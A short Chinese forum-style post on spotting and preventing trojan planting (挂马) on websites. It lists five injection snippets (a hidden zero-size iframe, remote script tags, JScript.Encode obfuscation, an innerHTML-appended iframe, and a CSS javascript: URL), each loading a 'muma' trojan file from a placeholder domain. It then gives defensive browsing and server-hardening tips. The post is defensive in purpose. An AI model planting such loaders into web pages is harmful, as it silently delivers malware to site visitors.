如何防止或知道网站被挂马

怕网站被挂马（中木马病毒），下面贴一些方法出来,以后大家看页面也小心一下这些字样的代码撒

一、最简单的也是最有效的
<iframe src=http://www.domain.com/muma.html width=0 height=0></iframe>
二、js挂马
<script src=http://www.domain.com/muma.js></script>
三、js变形加密
<SCRIPT language="JScript.Encode" src=http://www.domain.com/muma.txt></script>muma.txt可改成任意后缀的
四、不是嵌入了与iframe不同
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.domain.com/muma.htm/"></iframe>';
五、Css中挂马
body {background-image: url('javascript:document.write("<script src=http://www.domain.net/muma.js></script>")');}
css因为可以把内容提取到css文件,所以比较隐蔽...
六、Flash挂马


木马不是中了以后再找就能解决问题,要从源头解决问题...

代码严谨,服务器权限设置,补丁及时更新....都是比较不错的方法

防止中毒也不一定要靠杀毒软件...好的上网习惯等等都是很不错的方法

偶说下我一般怎么上网...

1.SEX站尽量不去...

2.浏览器开的话平时尽量屏蔽Javascript 图片 Active控件等....除非必须要用到这些再开启...而且如果那个网址你不经常去,要看一些网页源文件,看有没上边偶提到的那几种挂马的东东在...

3.邮件附件不确定的不下载...下载也杀毒...别人给的文件也不接,除非是自己需要的文件....

4.系统补丁一定即使更新..这个比杀毒有用...虽然很多0day还是掌握在某些黑客手中...但那些毕竟是少数的...中那些人的标不丢人..